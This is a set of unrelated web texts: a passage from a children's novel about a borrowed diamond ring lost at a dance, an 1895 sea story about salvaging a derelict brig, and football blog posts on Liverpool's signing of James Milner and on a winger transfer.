"O, well, if you won't you won't. But I should think you'd jump at the chance of going to a party," said Maudie, who did not bother over consideration for her own mother.
Just then Cousin Hannah poked her head in at the door. "Maudie, honey," she asked, conciliatingly, "can't you just run in and set the table when dinner's ready, so's I can stay up town with your Cousin Jennie and the girls? And if the telegraph operator comes in give him his dinner? You know he has to have it early."
"Why on earth can't the cook give him his dinner?" frowned Maudie, petulantly. "I hate that old operator, anyway. Isn't the cook hired to set the table? I ain't feeling well, and I don't want to overdo so's I can't go to the hall to-night."
"O, well," said her mother, resignedly, "I reckon I'll hurry back and 'tend to it myself, if you ain't feelin' well."
But Ruth spoke up eagerly: "Let me do it, Cousin Hannah. I don't care about going up town--and I'd love to do it for you."
"Bless your heart--you're a reg'lar little help-all!" beamed Cousin Hannah, gratefully, and with Mrs. Spooner and Elizabeth, went on her way in great content, knowing that everything would go on well at home.
Maudie stayed in her room and spent her time deciding on her party finery, while busy Ruth swept and dusted the big dining room, that was always in a state of more or less disorder, laid the table carefully and had the operator's dinner ready punctually.
"Have a good time, little daughter," Mrs. Spooner said to Ruth, when at the close of a long day of sightseeing she and the Babe were once more seated in the phaeton. And Ruth replied happily that she would--she was certain of having a perfectly beautiful time.
That night she wiped the supper dishes for the cook, and, after she had dressed, helped to button Cousin Hannah into her own tight and unaccustomed dress-up clothes.
Maudie, who declared that she never liked to be among the first because it was more genteel to be late, took a long time to dress but really looked quite pretty in her pale blue frock; Ruth, with heartily sincere appreciation, told her so.
"Thank you," acknowledged Maudie, languidly, eyeing Ruth's laundered white dress and pink girdle with tolerant pity. Then her eyes falling on Elizabeth's fan her expression changed to eager covetousness.
"Where in the world did you get that fan?" she asked. "Do you--do you really think it matches your dress? It seems to me a fan like that is out of place with a wash dress. I haven't one. I lost mine when I was at grandmother's."
"This is Elizabeth's; father sent it from Cuba."
Ruth spoke rather hesitatingly; she would have offered to lend the ornament at once, if it had been her own, for she was a generous little soul, but she did not feel like risking Elizabeth's property.
"I say," spoke Maudie abruptly, "lend me the fan, Ruth, and I'll let you wear my diamond ring."
"O, Maudie!" gasped Ruth, hesitation in her heart but delight in her eyes, "I couldn't--I oughtn't to wear your ring. Something might happen."
"Not a thing'll happen," declared Maudie impatiently. "Here, let me put it on your finger. No it isn't too loose, either; my finger's just as small as yours. I wish this fan was mine. It would have cost a lot over here, but in Cuba it's different--or of course your father couldn't have afforded it."
She had coolly appropriated Elizabeth's fan, waving it to and fro with complacent admiration. All Emerald had seen the diamond, but the fan was entirely new, and she realized that it would be greatly admired.
Poor little Ruth, dazzled by the flashing ring, forgot her mother's disapproval of borrowing, and went to the hall with a light heart.
The Spooner girls had gone to school in Emerald when their father was at home, and they could be spared from the ranch, so she knew all the boys and girls who were present, and was soon having a very jolly and sociable time, while Maudie, as befitting a person accustomed to city life, was moving about among the crowd with a rather bored air, displaying her finery to the admiring eyes of her neighbors, and waving Elizabeth's fan languidly.
Still, for all her indifferent air, Maudie felt aggrieved that Ruth, in her shabby white lawn, should receive so much attention, while she in her blue silk was comparatively neglected.
As she sat beside her mother and watched Ruth dancing merrily to the music of the band, Maudie felt a growing rancor towards her unoffending cousin, finally deciding that she would put an end to the enjoyment she could not take part in.
"I want to go home, I'm tired of it all--it is so stupid," she complained to her mother. "Besides, I don't feel very well. Call Ruth and let's go right away."
"No use disturbing Ruth, she seems to be enjoying herself, if you ain't," remarked Mr. Pratt, mildly. "Any of the young folks'll see her home safe."
But Maudie flatly refused to go without Ruth, who was hastily summoned from her dance by Cousin Hannah, and hustled unceremoniously away from the hall.
"O, I did have such a good time!" said Ruth, radiantly. "I'm so sorry we had to come away so soon, Maudie."
"It takes mighty little to give some folks a good time," said Maudie, tartly. "I thought the crowd was awfully coarse and common, even for Emerald. I hope you took good care of my ring," she continued, sharply, for Ruth uttering an exclamation, of fear, had stopped and was groping wildly about in the sand at her feet.
"O, Maudie!" Ruth's voice quavered with fear, "O, Maudie--I've lost it!"
"Lost my diamond ring!" Maudie shrilled wrathfully, "O, why was I such a goose as to lend it to you!"
"What's that? Your diamond ring that Grandma Pratt gave you? O, my me! Was Ruth wearing it? How'd that come? Whatever made you go and lose it, Ruth?" groaned Cousin Hannah, not waiting for a reply to any of her questions.
"It--it was too large," faltered Ruth, "it must have slipped off my finger. We'll find it in a minute. I know I had it on when we left the hail; I kept feeling of it because it didn't fit me very well."
"Then you'd no business to borrow it," scolded Cousin Hannah. "What made you wear it, if it was too loose?"
"Maudie wanted Elizabeth's fan," explained Ruth, miserably. "And--and she lent me the ring in place of it. I told her then it was too large."
"Yes, blame it all on me!" reproached Maudie, bitterly. "Here--take your old fan! I reckon it didn't cost more than a few cents, but at least I took care of it!"
"Think where you had it last, Ruth--think hard!" implored Cousin Hannah, distractedly, "I'd hate so for that expensive ring to be lost--just throwed away, you might say. I don't know what we could say to Grandma Pratt."
"I had it in the hall, I'm certain," said Ruth, dull with woe. "Of course I don't remember where or when it came off my finger."
"Then we'll go right back to the hall and search for it," decided Mr. Pratt. "Come along. No use in making so much fuss, Maudie. Wait till you're plumb certain it's gone for good."
Back to the still crowded hall they went, and poor Ruth, in bitter mortification, had to listen to Maudie's shrill announcement to all and sundry of the fact that Ruth had borrowed her diamond, and then lost it. Which came, she explained loudly, of lending things to people who weren't used to them, and couldn't understand their value.
"O," thought poor Ruth, in her despairing heart, "if I'd only listened to mother I never would have been in all this trouble--if I'd only listened to mother!"
Mr. Pratt, going to the young men who had charge of the hall, made known to them the loss, and there was much searching, but all without result--Maudie's ring was indeed gone!
Downheartedly the party trailed along home; Maudie in tears, sobbing wrathfully that she would never, never lend her things again--no matter if people did beg and pray her to do it. No indeed, she had learned a lesson!
And Cousin Hannah, with torturing insistence, kept asking over and over again if Ruth couldn't remember where she had lost the ring. She ought to try and remember, seeing that it was her own fault. She oughtn't to have worn a ring she knew was too loose for her finger.
To these questions Ruth could only answer, over and again, that she didn't know--she didn't know! Indeed she was fast becoming hysterical with fright and worry.
Then mild little Mr. Pratt astonished them all by speaking with authority that commanded attention.
"That's quite enough, Hannah," he said sharply. "Maudie, don't let's have any more noise from you! If your ring's gone it's gone, that's all there is to it. I told mother, when she asked me about it, that it was foolish to give you a diamond when you was so young. I don't know if I ain't glad it's lost, if you want my opinion. Now understand, I want an end to all this talk. No use in badgerin' poor Ruth to death, either, Hannah."
"For pity's sake, Jim!" exclaimed Cousin Hannah, "I didn't aim to badger the child. There, honey, don't cry over it--accidents will happen. I didn't aim to hurt your feelin's, no mor'n you aimed to lose the ring. I was jest sorter flustered-like." And she patted Ruth's hand soothingly.
Maudie, though sniffing dolefully, said no more at the moment, being warned by a certain unaccustomed note in her father's voice that his commands must be obeyed. But in the privacy of their room that night she turned the thumbscrews on poor Ruth with savage pressure.
"Of course people who are just a little above paupers can lose other people's property without worrying much about it," she remarked sarcastically.
And Ruth, in a burst of indignation at such aspersions on her family, answered spiritedly: "No such thing, Maudie Pratt! I intend to pay you for your ring, of course."
"Pay me?" Maudie jeered, scornfully. "O yes, it's likely you'll ever be able to pay me a hundred dollars for my diamond!"
Ruth gasped--the amount was so far above her calculation. But her fighting blood was up, for the honor of her family was at stake.
"I haven't the money on hand, but I'll certainly pay you by next Thanksgiving," she said, with proud resolution.
And the green cardboard box at home, containing all the money she possessed in the world, held just thirty-five cents!
Return to the The Girls of Silver Spur Ranch Summary Return to the Grace MacGowan Cooke Library
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Bringing in a Derelict
by Walter McRoberts
Bringing in a Derelict is an seafaring adventure story published in McRoberts' collection, Rounding Cape Horn and Other Sea Stories (1895).
The West India hurricane of August, 1893, was one of unusual severity, and caused great havoc among shipping on the Atlantic seaboard from Florida to Maine. Besides the large number of vessels lost by going ashore, many were abandoned by their crews at sea after having sprung a leak or become water-logged. A large part of these craft subsequently foundered, but a number of them were vessels bound from Georgia ports to Boston and New York with cargoes of hard pine lumber, and in these cases the vessels, after becoming full of water, “floated on their cargoes;” that is to say, the buoyancy imparted to the wrecks by the lumber in their holds kept them from sinking as they ordinarily would have done. Some of these derelicts have been known to float for a year or two, round and round in a beaten track, forming a source of great peril to navigation; until, the lumber becoming thoroughly saturated with water, the wreck finally sinks. In some instances the abandoned vessel is torn to pieces by the violence of successive storms before this stage has been reached.
The most remarkable case of this character is that of the American schooner Fannie E. Wolston, which was abandoned at sea in October, 1891, and was still afloat three years afterward. She was sighted scores of times during this long interval, and was more than once set on fire by passing vessels. Her travels brought her from Cape Hatteras to mid-ocean; from the tropical Bahamas nearly to the shores of Europe; and in almost every part of the North Atlantic she was frequently seen. Covered with barnacles and sea-weed, reduced to a mere skeleton, and with one rusty anchor still hanging from her bow, this celebrated derelict continued for thirty-six months her long pilgrimage without captain or crew. The bitter gales of three Atlantic winters, that disposed of the ill-fated Naronic and a hundred other staunch vessels were unable to sink the Fannie E. Wolston. When last seen in September, 1894, she had nearly completed the third year of her phenomenal career as an abandoned wreck, during which long period it is computed that her drift was more than eight thousand miles. She was the record-breaker of derelicts.
A sailing ship arrived at Philadelphia early in September, having on board the captain and crew of the brig Neptune, which had been abandoned four days previously, two hundred miles east of Cape Hatteras, while on a voyage from Savannah to Boston with a cargo of Georgia pine. Within a month the brig was sighted no less than five times by steamers arriving at New York—the last time being in Lat. 42° N., Long. 65° W., a point several hundred miles directly east from Boston. Thus in four weeks this derelict had drifted nearly six hundred miles to the northeast of the spot where she was abandoned.
Nothing having been done towards recovering her, at the expiration of a month the owners of the powerful ocean tug Atlas, of Philadelphia, determined to despatch that vessel in search of the Neptune; for, could the latter be brought into port, the owners of the tug would reap a profitable harvest in the way of salvage.
Accordingly, one fine autumn morning, the Atlas steamed out from the Point Breeze Oil Wharves on the Schuylkill River, with a three weeks’ supply of coal and all the most efficient apparatus for wrecking and sea-towing. She was a staunch tug of 800 horse power, and was equipped with a powerful electric search light. There were on board Captain James and ten men, besides Albert Shaw, the captain’s cousin, who had no connection with the tug, but had obtained permission to make one of the party more through a love of adventure than anything else.
After rounding the Delaware Capes and entering the open ocean, the course was laid N.E. by N., and Captain James remarked to his cousin as he finished examining the chart, “Yes, Al, if all goes well we ought to overhaul that brig within five days, somewhere about 44 and 62.”
“You appear to regard falling in with her as a foregone conclusion,” replied Mr. Shaw, somewhat surprised. He was a pale, slender young fellow of twenty-two, and was much more expert at entering up cash and taking off trial balances than at figuring latitude and longitude.
“Why,” answered the captain, “I’ve marked on this chart the date and the place where she was abandoned; then I’ve put down a cross and the date at the exact spot she’s been sighted five different times since, and by connecting all my crosses with a pencil mark and figuring the distance between each one, I can tell about how much and in what direction that wreck is drifting each day. She’s in the Gulf Stream, which she won’t get out of till I tow her out. There’s the dinner bell.”
The captain’s explanation had enlightened Albert as to the method to be pursued in locating the wreck; though, to tell the truth, he was a little skeptical in regard to the final outcome of the matter. There was a brisk sea running, and in spite of the table-rack, it required no little dexterity to prevent beef, vegetables and condensed milk from mingling in one confused jumble; but every one was in good humor, and the fresh, salt air had sharpened the appetites of those who gathered about the little table, and especially that of the captain’s cousin, who averred that he had not been so hungry in six months. Dinner over, Albert busied himself in exploring every part of the tug and investigating the night signals, when suddenly Captain James called to him from the upper deck. Upon ascending thither, he was informed that the Atlas was bearing down on a floating lumber yard. Looking ahead he saw, still some distance away, great quantities of planks floating about; in fact the ocean seemed literally covered with them, forming a curious sight.
The tug soon reached the outer edge of the moving mass, and Jim Speers, the mate, remarked as he surveyed the white clean planks with a critic’s eye, “Fine lumber, that. Some good-sized vessel’s lost her deck-load, I reckon.”
The planks rose and fell on the long regular swell, and as some of them were occasionally lifted partly out of water by a sea, their shining wet surfaces reflected the sun’s rays with dazzling brilliancy. In some places they were massed together so closely that it was difficult to find a passage through them, and though the greater portion of this valuable lot of timber was soon left behind, masses of planks were met continually for a distance of nearly twenty miles. Captain James took the bearings of the main body so as to report the matter upon reaching port.
A six-knot breeze was blowing next morning but the sun did not show himself, and noon having come with the sky still cloudy, the Captain was compelled to figure out his position by dead reckoning, which is not so accurate as a solar observation. He calculated that if everything went well, the tug should not be far from the Neptune at the end of twenty-four hours, providing his estimates of the brig’s drift were correct.
The afternoon wore on, and the skipper and his cousin had paced the narrow deck for some moments in silence, when the former remarked meditatively, “I had a queer experience with a derelict once,—just after I took this tug.”
“How was that?” asked Albert.
The captain finished filling his pipe with fragments of tobacco which he cut from a plug, and continued:
“It was about two years ago that I received orders to go after the derelict bark Pegasus. She had sailed from a Nova Scotia port for the West coast of Ireland with one million feet of deals aboard, and after being abandoned in a big blow was sighted several times. I’m a sinner if we didn’t cruise twenty-five hundred miles and use up half our coal when, on the twelfth day out as I came on deck, my mate said to me, “Captain, there’s a lame duck two points on the port bow.” (We seamen often speak of a crippled vessel as a lame duck.) Well, we’d run that bark down at last, and we lost no time in getting her in tow. After towing her two days, what do you think happened?”
“The hawser parted?”
“She sank—went right down—and I went back to port the most disgusted man in Philadelphia. We found, after we got in, that a steamer passing the wreck and considering her dangerous to navigation had set fire to her; but after burning the main deck nearly through, and a hole in the stern, the fire had been put out, probably by the seas which the bark shipped. This was only a couple of days before we sighted her. While we had her in tow I noticed that a good deal of lumber washed out every time a big sea struck her, and I didn’t like it much either, though I made no doubt she’d float till we reached port. But, as I said, she played me a mean trick and foundered about four hundred miles off the Delaware Capes.”
“That was tough luck,” commented Albert, as he glanced at the dial of the taffrail log which trailed astern—its brass rotator revolving rapidly just beneath the surface of the dark blue water.
Next day was bright and sunny, and an extra sharp lookout was kept, for it was hoped to sight the derelict within the next twelve hours. After ascertaining the tug’s position at noon, the course was changed to N.N.E., and things went on as before. Mr. Shaw pored over the chart of the North Atlantic, and was in a state of impatient expectancy all day, although the mate kindly informed him that they might not sight the brig for a week yet, if indeed they ever did.
It lacked but a few minutes of sunset, when the captain, who for some time had been standing near the pilot-house sweeping the horizon with his glass, cried sharply, “Starboard your helm, there!”
“What’s up now?” asked Albert, ascending the ladder to the upper deck.
“A wreck of some kind, dead ahead.”
Taking the glass, he saw nothing at first, but finally made out an object that looked like a pole sticking out of the water.
“That stick is the mast of a vessel,” replied the captain, in answer to Shaw’s inquiry, “and at least half of it is carried away. The hull must be awash too, or we could see it plainly now, for she can’t be over six miles off. If the craft was in her natural condition, I’d have sighted her long ago—at twelve miles certainly. A little more and we’d have run right away from her.”
“Does she look like a brig, sir?” asked Speers.
“Can’t make out her rig yet. The chap we’re after is hereabouts somewhere if I’ve calculated right,” said the captain, taking another survey of the object ahead.
The tug was rapidly closing up the gap between herself and the wreck, and the faces of those on board presented an interesting study. Captain James was anxious to know whether the wreck they were approaching was the brig he was in search of. The usual excitement caused by the sight of an abandoned vessel did not affect him; it was simply a matter of business. So also with Speers, though perhaps to a less extent. The majority of the crew contemplated the stranger with feelings akin to indifference. Many of them did not know the name of the vessel they were in search of,—neither did they care. But Albert was looking at a genuine wreck for the first time, and his heart beat faster as the ocean waif grew more and more distinct, with her shattered masts, disordered rigging and general appearance of desolation.
“Neptune!” cried Captain James, as he made out the gilded letters on the port bow. He had already formed the opinion that she was the craft of which he was in search, as enough of her spars were left to show that she had been square-rigged on her foremast, and brigs are now comparatively scarce.
When the tug was within a few rods of the Neptune, her boat was launched, and the mate, Albert, and two of the crew entered, when it was rowed around to the brig’s bows in search of a favorable place for boarding. A large rope, probably the starboard fore-brace, was entangled in the standing rigging in such a manner that fifteen or twenty feet of it trailed in the water alongside the wreck. The mate picked up the rope’s end, and drew the boat so close to the brig that, taking advantage of the next roll she gave towards him, he seized a lanyard and was soon on board. Albert and Joe Miller followed. The other man, known as “Sharkey,” remained in the boat to see that she did not get stove against the side of the wreck.
Speers took a cursory glance around, and then hailed the tug. “All ready, sir,” he cried. A rope had been fastened to one end of the tug’s big hawser, and the other end of this rope Captain James now hove, so that it landed on the brig’s forecastle deck. The mate and Joe Miller hauled it in, and secured the hawser to the brig’s bows. This important task having been accomplished, the boarding party proceeded to take a thorough survey of the wreck.
The foremast was gone at the lower mast-head, leaving the fore yard still in its place, upon which the tattered remnants of the foresail were still visible. It had apparently been clewed up without having been furled, and the winds of five weeks had whipped it into ribbons. The entire mainmast was gone about ten feet above the deck, and in falling had smashed the bulwarks on the port beam and quarter so that the water flowed all over the deck, where it was several inches deep. She was so low that her main deck was level with the ocean, and small seas were constantly toppling over her bows and low bulwarks, where they broke in showers of spray. The main boom was hanging over the side, while the bowsprit and all the jibs were entirely gone. The main hatch was battened down, but the fore was off, and upon looking below the cargo of lumber was seen pressed up close under the hatch, where it occasionally surged slowly from side to side in obedience to the sluggish motions of the brig. On top of the after house a small boat painted white was lashed, having in some way escaped the general destruction. The wheel and rudder appeared uninjured. There was a perfect litter of ropes, blocks, standing rigging, etc., floating about the deck, all tangled in a confused mass.
The party now entered the cabin. Everything here was drenched; the skylights were gone; fragments of glass encumbered all that portion of the floor not under water; and there was a damp, musty smell such as one encounters on entering a cellar not often opened. The captain’s compass was still in its place under the centre skylight, but its brass work was badly stained with salt water. The state rooms were in much the same condition as the cabin, and the whole port side of the after house seemed to be slightly stove. The companion-way door was ripped off, and nowhere to be seen.
On emerging from this dismal place the mate took a peep into the crew’s quarters. The rows of bunks in which the men had slept still contained a mouldy mattress or two, while a large cask that had doubtless been used as a table was rolling about the floor. A couple of rusty pannikins floated about in the shallow water. It was of course impossible to enter the lazarette or the fore peak, for they were submerged. All the provisions were ruined, but the scuttle butts contained plenty of fresh water.
Having finished his examination, Speers sent the boat back to the tug for a supply of provisions for Miller and Sharkey, who were to remain on the wreck to steer her. As soon as the stores were placed aboard, and a few directions given, Albert and the mate pulled away from the derelict, for a squall was making up in the north-west and it was high time to get under way. Mast-head lanterns were run up, and the two vessels started for Boston.
There was plenty to talk about that night, and Albert staid up long past the usual time conversing with the master of the tug, who was in a jubilant mood, and who more than once invited his cousin to “splice the main brace.” [101]
“The owners will have to give me credit for quick work this time,” the captain said. “Monday we left Philadelphia; Wednesday we picked up the derelict; and on Friday—or Saturday at furthest—we ought to steam up Boston Harbor. Speers says the brig’s cargo seems in good shape, and if so it should easily bring $7,000 at auction. The hull may fetch a thousand more. Not a bad haul, Mr. Shaw for five days’ work.”
“This derelict business seems profitable.”
“It is—if you can find the derelict. For instance, the schooner Sargent has been floating about the North Atlantic ever since last spring, with twenty thousand dollars’ worth of mahogany in her hold. There is a prize worth trying for, but although a score of vessels have sighted her, several of which attempted to tow her in, she is still drifting about with a small fortune on board. Last month some Baltimore parties organized an expedition and chartered a steamer to find the Sargent and bring her in. They searched for several weeks, and then returned to port considerably out of pocket, to find that a Cunarder had just seen the schooner not forty miles off the course they had taken.
“But I must go on deck; the night looks squally.”
Albert turned in, and dreamed of drifting about the ocean for many weeks on a water-logged wreck, which foundered the instant assistance was at hand and he escaped only by leaping out of his berth against the wall.
The heavily laden brig, submerged to her decks, offered a great resistence to the water, and when a brisk head wind sprang up, the powerful tug was scarcely able to make headway. Several rain-squalls were encountered during the night, and by sunrise there was every indication of a gale.
A heavy swell was running, the wind increased, and Captain James felt some concern for the safety of his tow. By noon a hard northwester had set in, accompanied by an ugly head sea. Both vessels were under water most of the time, nothing of the derelict being visible but her masts and deck-houses, while the tug struggled through the heavy rollers and blinding spray with only her smoke-stack and pilot house above water.
It was a day of anxiety. The wreck was simply a sodden mass of timber, without buoyancy, and dragged and pulled on the huge hawser in a manner that caused continual apprehension. Instead of rising to meet the big rollers, she went lurching and floundering through them; burying herself in the brine, and then coming up with a backward jerk that made the captain catch his breath. Even a steel hawser has its limits of endurance.
Night closed in chill and comfortless, with no sign of immediate improvement. Albert put on a life-preserver, braced himself in his bunk without undressing, and wondered if he should ever see terra firma again, while the cook shook his head and confided to a deck-hand that “this was what come of having landsmen aboard.”
The wind blew harder, and even a full steam pressure hardly sufficed to drive the Atlas along. The middle watch was half over when the straining tug plunged suddenly forward, rolling and pitching violently, as though freed from a cumbersome weight. At the same instant a muffled cry was heard by those on the upper deck. All knew its meaning—the derelict was adrift!
The night was black as pitch; mist and spray obscured everything; and almost before the order to reverse the engines could be given, the wreck was vanishing in the gloom. The tug’s head swung round and she started in pursuit.
Fifteen minutes sufficed to show Captain James the utter futility and peril of attempting to recover the brig until the gale moderated. The Atlas was being literally overwhelmed and forced under water by the furious seas which overtook her. She could not steam fast enough to escape them. One great comber bent the smoke-stack, smashed the pilot-house windows, tore away the life-boat, and bore the tug down until it seemed as though she would never come to the surface. It was madness to continue, and the Atlas was put about and hove to.
Never in his life had her captain suffered such keen exasperation as now. With water streaming from his oilers, he stood grasping the pilot-house rail, and watched the derelict’s mast head light glimmering astern like a will-o’-the-wisp; now hidden by a great wave,—now reappearing fitfully,—now swallowed up in the black night. He strained his eyes through the salt mist till they ached, but the dismantled wreck and her imperilled crew were seen no more.
The captain went below, and calculated as accurately as possible the tug’s position when the derelict broke adrift, the direction and velocity of the wind, and force of the current. Nothing could be done until the gale moderated. There was ample time for everyone to discuss the misfortune, and speculation was rife as to the fate of Joe Miller and Sharkey, who had last been seen at dusk, lashing themselves to the shrouds. This would save them from going overboard while the rigging held, but their slender stock of provisions must have been swept away or ruined by water, which would render their position desperate unless quickly rescued.
The gray dawn came, by which time the worst was over, and eager eyes scanned the sea for some trace of the brig. But the wreck, sitting very low in the water and with only a few feet of her masts left, had drifted out of the line of vision, though she was probably not fifteen miles away. Wind and sea were still boisterous, but the search began immediately.
The conditions in general seemed to favor a speedy recovery of the Neptune, for the wind was still in the same quarter, the day was clearing rapidly, and the wreck having no sails and being practically under water, could drift but slowly. But the brig’s condition, coupled with the fact that the tug herself sat very low, ormed no slight obstacle to early success. Had the Atlas possessed a tall mast, the derelict might have been visible from it, but nothing could be seen from the roof of the pilot-house save the smoke of a steamer on the northern horizon. As time passed, bringing no tidings of the missing vessel, the excitement increased, and a handsome reward was promised any man who should first sight the wreck. Twice a false alarm was given, but the day waned until the shadows stole over the deep. Still there were no tidings.
Through the starlit night Captain James thought of his absent men and of the sufferings they must be enduring. He sent up rockets at intervals, though with little hope of an answer; for the Neptune’s signalling apparatus was doubtless ruined by water, and his men would be powerless to make their presence known.
The sea was calm at daybreak, the sun shone brightly as the hours flew by, and the tug covered many leagues, while the promised reward kept all hands on the alert. The Atlas overhauled a large bark, and spoke her, but she had seen nothing of the Neptune; and another day drew to a close.
One of three things had happened: the derelict had foundered, had been taken in tow by a passing steamer, or was still drifting helplessly about. The first supposition was improbable, if not impossible. Experience has shown that a vessel in the Neptune’s condition can survive tempests that send stout ships to the bottom. As to the second, the number of steamers having facilities for towing wrecks is small, and the castaway’s value must be great to induce one to attempt salving her. The last supposition was probably the true one. A vessel may float about the steam-traversed North Atlantic for weeks without being seen, and not five derelicts in a hundred are ever brought into port. After weighing the chances carefully, the captain came to the conclusion that the brig was still an aimless wanderer, though it was incomprehensible how she could have eluded so thorough a search.
The next day was but a repetition of the one preceding, and this continued until the days became a week. Hope was almost gone, the coal was two-thirds consumed, and still Captain James would not give up.
Finally, ten days after the loss of the Neptune, the Atlas abandoned the search and returned to Philadelphia.
As soon as she was sighted by the operator in the marine signal station, the fact was telephoned to the city; and when she reached the dock, one of the owners was on hand to meet her. Joe Miller and Sharkey were there also, sitting on a box of merchandise, and exhibiting no traces of suffering or emaciation.
The surprise of the tug’s people was great, but the captain was soon enlightened as to the derelict’s fate. That troublesome craft had been picked up the morning after she broke adrift, by a West India fruit steamer bound to Boston. Three-fourths of the steel hawser was still attached to the Neptune, so the steamer had only to fish up the broken end, secure it to her stern bits, and continue on her way. The weather remained fine and she reached her destination the second day afterward.
The division of the salvage money was a delicate matter. An abandoned vessel becomes the property of whoever brings her into port, but in the present instance the derelict was held to be the tug’s property even after she broke adrift, because she continued in possession of two of the tug’s crew, who remained on her from the time the hawser parted until she was safely beached on the mud-flats in Boston harbor. Consequently, she was not legally “an abandoned vessel” when the fruiter picked her up; nor could the latter have handled her at all except for the tug’s hawser. But the steamer had rendered an unquestioned service by towing the wreck into port, and was therefore entitled to a portion of the money. She was finally awarded 25%, while the remainder went to the Atlas.
The lumber cargo realized a trifle over $6,000 at auction, but the brig’s hull had been badly strained and battered in the last gale, and brought only $500. Her age, combined with her severe injuries, made it unprofitable to put her in sea-going condition, and she was converted into a lighter for transferring merchandise about Boston harbor, in which humble capacity she will probably end her days.
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James Milner - Adding another level to the Liverpool midfield
Anfield Index > Liverpool FC Articles > James Milner - Adding Another Level to the Liverpool Midfield
James Milner’s move to Liverpool was a poorly kept secret.
It was more of a matter of when and not if he’d sign for Liverpool. His signing once again split an already fractured fan base. Yes, he arrived on a free transfer but wages and signing on fee were rumoured to be a fairly handy bit of money and this didn’t sit well with some fans who felt this could’ve been used elsewhere. However, if you put that to one side for a moment and look at the player Liverpool signed it could be argued it was a coup for the club.
He’s not the normal FSG signing. Famed, and often criticised for signing youth and potential, this was on the opposite end of the spectrum. They were switched on enough to know losing Steven Gerrard was going to have a big impact on the side and leave them looking even more inexperienced both on and off the pitch. The signing of Milner adds experience in terms of playing age, playing in big games and a winning mentality. James Milner didn’t start every game for Man City but he’s still been involved, and played a big part in a side that’s won the league twice and finished runners up twice in the last 4 years. Adding that sort of experience isn’t something to be laughed at. He shouldn’t be considered beneath us because he’s not a *star* signing we all wanted. I really feel having Milner beside him will help Henderson in his new role as captain. Having a league winning midfielder and someone who has 50+ England caps can only be a good thing, surely?
James Milner doesn’t just bring experience. He’s also the Jordan Henderson doppelganger in terms of pressing and work rate. We all remember how Jordan Henderson got a lot of acclaim in 2013/2014 for how effective he was in our set up? Well imagine that x 2. Brendan Rodgers has already alluded to playing a high press at the opening of the game and James Milner could be just as integral as Jordan Henderson in this tactic. It would be a marked improvement on what Steven Gerrard offered in terms of pressing. Liverpool would have a fully functional midfield.
The goals brigade will like James Milner.
On top of experience and suiting the Liverpool style, James Milner brings something the Liverpool midfield otherwise lacked. Goals. James Milner throughout his career is a 1 goal every 10 game player in terms of stats, or roughly 4 per season on average. This may not sound an awful lot but as I’ve spoken about before a natural centre midfielder to score 6 open play goals is above average for goal scoring numbers.
If you look at the other Liverpool midfielders they have Jordan Henderson who over the last season has averages 6 per season (very impressive output), Joe Allen who averages 1 per season, Lucas Leiva who averages less than 0.5 goals per season and Emre Can who in his 40 league games in centre midfield has averaged an impressive 5 goals, but only has 1 for Liverpool. It’s looking a little bare, isn’t it?
I know Milner’s total of 4 may not seem important but you’ve got to remember for the majority of his Man City career he was played out wide with the primary objective of creating. This differs to his expected role with the Reds as he’ll be playing in a centre midfield role and he’ll be afforded the luxury of pushing on and joining attacks like he did against Adelaide. If he gets into the box as he did in that game you’d assume he’d match or surpass his 4 goal average and that can only be positive for Liverpool in their quest for top 4.
As I’ve mentioned many times before, with Liverpool conceding on average 44 per season they need to score 70 plus so adding goals, even if it’s 1 or 2, will be vital if they’re to get near the required number. In an ideal world you want 15 goals from your centre midfielders and James Milner will play a huge part in that number. If, and it’s a big if, Liverpool are a cohesive unit and their high intensity press works as planned in the opening half of games you’d like to think Jordan Henderson and James Milner could get 15 league goals between them. Jordan Henderson is progressing but here’s a gentle reminder, James Milner is a better finisher than our newly announced captain. We all thought it’d be Jordan Henderson being unleashed this season without Steven Gerrard beside him but what if it’s actually Jordan and James both being unleashed? It’s something to think about, especially when you consider Christian Benteke is going to be creating space and gaps in defences with his sheer presence. The onus will be on our midfield duo to push on, support and exploit the space.
All these positives and that’s before you even take into account the versatility he brings to the squad. He is able to play right-back, right midfield, right wing, centre midfield, left wing and even as a false 9 having done so for Manchester City. You’d like to imagine he could do a job as a defensive number 10 with the sole purpose of winning the ball in a dangerous position. He fits in with an already versatile squad which will no doubt be utilised by Brendan Rodgers as he inevitably tweaks the formation at various stages throughout the season.
The kind of form he’s shown in pre season is nothing but a positive. You don’t read into pre season games much but my positivity comes from how well he’s bedded in with the team and seems to have a rapport already with Jordan Henderson.
I wrote about Danny Ings being a shrewd signing and the same could be said for James Milner.
by Sam McGuire
*Insert picture of Gerrard kissing the camera at Old Trafford here*
Follow @SamMcGuire90
2 responses to “James Milner – Adding Another Level to the Liverpool Midfield”
If Can is played properly in his midfield role he can, with this present team, provide 6 per season and possibly a few more as he improves with age.It all depends on BR playing all in their proper positions. Alas he probably will continue with his square peg/round hole tinkering.
Jay Wright says:
Adding Milner gives us Milner, Henderson, Firmino, Benteke & Coutinho to occupy 5 central attacking areas already.
I don’t understand what the plan for this season is, when you consider that that’s 5 out of 6 midfield/forward spots covered, with no natural width or explosive pace in the final third, and no defensive midfielder yet identified.
I hope I’m proved wrong, but until then I’ll continue to argue that signing Milner was not a smart move for either the short-term or long-term progress of LFC.
Categories: Liverpool FC Articles and Liverpool FC Opinion.' 'Tags: Brendan Rodgers, Emre Can, Featured, Gerrard, Henderson, Henderson Stats, James Milner, Jordan Henderson, LFC, LFC Stats, Liverpool, Liverpool FC, Liverpool FC Stats, Liverpool Football Club, Milner, Milner stats and Premier League.
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A look at Liverpool's transfer activity this summer. Part III Winger
Anfield Index > Featured Article > Transfer Window Review (Part 3) - Winger
Transfer Window Review (Part 3) - Winger
This is Part III of my Transfer Window review, and a follow up to my original articles for “What our Team Needs” which I wrote back in April. Part I (Defenders) can be found here, and Part II (Midfielders) here.
When I wrote the original article, “What our Team Needs – A Winger“, it was probably the most important transfer that we needed to make this summer. While we had some key areas that needed filling, a natural winger was something we have lacked for as long as I can remember. The likes of Garcia, Benayoun, and Riera all had pretty solid spells at times with Liverpool, but lacked many of the “traditional” winger qualities. The definition of a “Winger” (from Wikipedia) will help you understand just what we have been lacking for so long, arguably since the great John Barnes (possibly with the exception of McManaman).
“Wingers often try to use pace to exploit extra space available on the flanks that can be made available by their team-mates dominating the centre ground. In sports where the main method of scoring involves attacking a small goal (by whatever name) in the centre of the field, a common tactic is to cross the ball to a central team-mate.”
